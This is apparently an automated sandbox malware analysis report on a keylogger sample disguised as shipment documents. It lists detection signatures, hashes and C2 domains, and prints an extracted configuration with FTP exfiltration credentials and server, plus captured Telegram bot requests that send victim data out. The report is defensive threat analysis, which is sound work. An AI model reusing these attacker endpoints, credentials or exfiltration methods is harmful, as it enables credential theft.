Windows Analysis Report
rShipmentDocuments.exe

Overview

General Information

Sample name: rShipmentDocuments.exe
Analysis ID: 1531471
MD5: ff8c4ab4ec18f05864879323f4a41050
SHA1: 6552329870d1a2627b5e9b6b6cfd3d2efea87735
SHA256: db4523c5fa05acf8d6c8d47c722a5c39a728078f94a7f6877faa0a6fb87afc33
Tags: exeSnakeKeyloggeruser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Found malware configuration
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "FTP", "Username": "Soma@hulonqgroup.com", "Password": "TNwhAkO^1&lZ", "FTP Server": "ftp://185.230.141.85/", "Version": "4.4"}
Multi AV Scanner detection for domain / URL
Source: http://varders.kozow.com:8081 Virustotal: Detection: 14% Perma Link
Source: http://aborters.duckdns.org:8081 Virustotal: Detection: 13% Perma Link
Source: http://51.38.247.67:8081/_send_.php?L Virustotal: Detection: 7% Perma Link
Source: http://anotherarmy.dns.army:8081 Virustotal: Detection: 17% Perma Link
Source: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded Virustotal: Detection: 7% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Virustotal: Detection: 37% Perma Link
Multi AV Scanner detection for submitted file
Source: rShipmentDocuments.exe Virustotal: Detection: 37% Perma Link
Source: rShipmentDocuments.exe ReversingLabs: Detection: 28%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: rShipmentDocuments.exe Joe Sandbox ML: detected

Location Tracking
barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknown DNS query: name: reallyfreegeoip.org
Uses 32bit PE files
Source: rShipmentDocuments.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: rShipmentDocuments.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 02A3F45Dh 9_2_02A3F2C0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 02A3F45Dh 9_2_02A3F4AC
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 02A3FC19h 9_2_02A3F961
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F31E8h 9_2_068F2DD0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FF661h 9_2_068FF3B8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F0D0Dh 9_2_068F0B30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F1697h 9_2_068F0B30
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F2C21h 9_2_068F2970
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FE959h 9_2_068FE6B0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FE0A9h 9_2_068FDE00
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_068F0673
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FF209h 9_2_068FEF60
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FCF49h 9_2_068FCCA0
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F31E8h 9_2_068F2DCA
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FD7F9h 9_2_068FD550
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FE501h 9_2_068FE258
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FEDB1h 9_2_068FEB08
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FD3A1h 9_2_068FD0F8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FFAB9h 9_2_068FF810
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_068F0040
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 9_2_068F0853
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068FDC51h 9_2_068FD9A8
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Code function: 4x nop then jmp 068F31E8h 9_2_068F3116
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 069C9E1Dh 10_2_069CA0A0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 0303F45Dh 16_2_0303F2C0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 0303F45Dh 16_2_0303F4AC
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 0303FC19h 16_2_0303F961
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8F661h 16_2_06D8F3B8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D80D0Dh 16_2_06D80B30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D81697h 16_2_06D80B30
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D831E0h 16_2_06D82DC8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D82C19h 16_2_06D82968
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8E959h 16_2_06D8E6B0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8E501h 16_2_06D8E258
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 16_2_06D80673
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8E0A9h 16_2_06D8DE00
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8F209h 16_2_06D8EF60
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8EDB1h 16_2_06D8EB08
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8D3A1h 16_2_06D8D0F8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8CF49h 16_2_06D8CCA0
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 16_2_06D80853
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 16_2_06D80040
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8FAB9h 16_2_06D8F810
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D831E0h 16_2_06D82DC3
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8DC51h 16_2_06D8D9A8
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D8D7F9h 16_2_06D8D550
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Code function: 4x nop then jmp 06D831E0h 16_2_06D8310E

Networking
barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPE
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49205 -> 185.230.141.85:49693
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: HostingvpsvilleruRU HostingvpsvilleruRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49766 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.96.3:443
Uses FTP
Source: unknown FTP traffic detected: 185.230.141.85:21 -> 192.168.2.4:49204 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 07:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown TCP traffic detected without corresponding DNS query: 185.230.141.85
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:40:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2011/10/2024%20/%2015:30:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
